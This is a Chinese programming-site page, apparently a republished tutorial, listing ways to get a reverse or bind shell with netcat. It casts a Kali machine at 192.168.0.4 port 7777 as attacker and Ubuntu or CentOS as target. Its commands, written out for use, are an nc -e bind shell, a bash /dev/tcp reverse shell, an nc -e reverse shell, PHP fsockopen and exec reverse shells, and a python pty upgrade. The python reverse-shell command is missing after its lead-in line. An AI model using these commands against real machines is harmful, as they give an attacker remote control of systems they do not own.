您现在的位置是:网站首页> 编程资料编程资料
详解NC反弹shell的几种方法_linux shell_
2023-05-26
507人已围观
简介 详解NC反弹shell的几种方法_linux shell_
假如ubuntu、CentOS为目标服务器系统
kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用
最终是将ubuntu、CentOS的shell反弹到kali上
正向反弹shell
ubuntu或者CentOS上面输入
nc -lvp 7777 -e /bin/bash
kali上输入
nc ip 7777
正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。
需要目标机安装nc。
反向反弹shell
方法1:bash反弹
bash -i >& /dev/tcp/ip/port 0>&1
但首先需要在kali上使用nc监听端口:
nc -lvp 7777
此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。
方法2:python反弹
反弹shell的命令如下:
首先,使用nc在kali上监听端口:
nc -lvp 7777
在CentOS或者ubuntu下使用python去反向连接,输入:
此方法ubuntu和Linux均反弹成功。
方法3
首先在kali上输入nc监听:
nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向连接,命令如下:
nc -e /bin/bash 192.168.0.4 7777
方法4:php反弹shell
首先在kali上输入:
nc -lvp 7777
然后在目标机上输入:
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")' 或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");' 注意php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。
遇到反弹后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")' 转化为常规的shell。
到此这篇关于详解NC反弹shell的几种方法的文章就介绍到这了,更多相关NC反弹shell内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!
相关内容
- Linux Shell脚本中获取本机ip地址方法_linux shell_
- Shell用sed命令删除特定行的方法_linux shell_
- Linux shell select菜单选择实现代码_linux shell_
- 工作中使用Shell实用脚本_linux shell_
- Shell中正则表达式及sed和awk常见问题_linux shell_
- shell批量创建文件并重新命名的实例代码_linux shell_
- Shell编程中Shift的用法小结_linux shell_
- 通过shell脚本对mysql的增删改查及my.cnf的配置_linux shell_
- shell脚本加密工具shc使用详解_linux shell_
- Shell脚本之文件批量创建与修改的简单方法_linux shell_
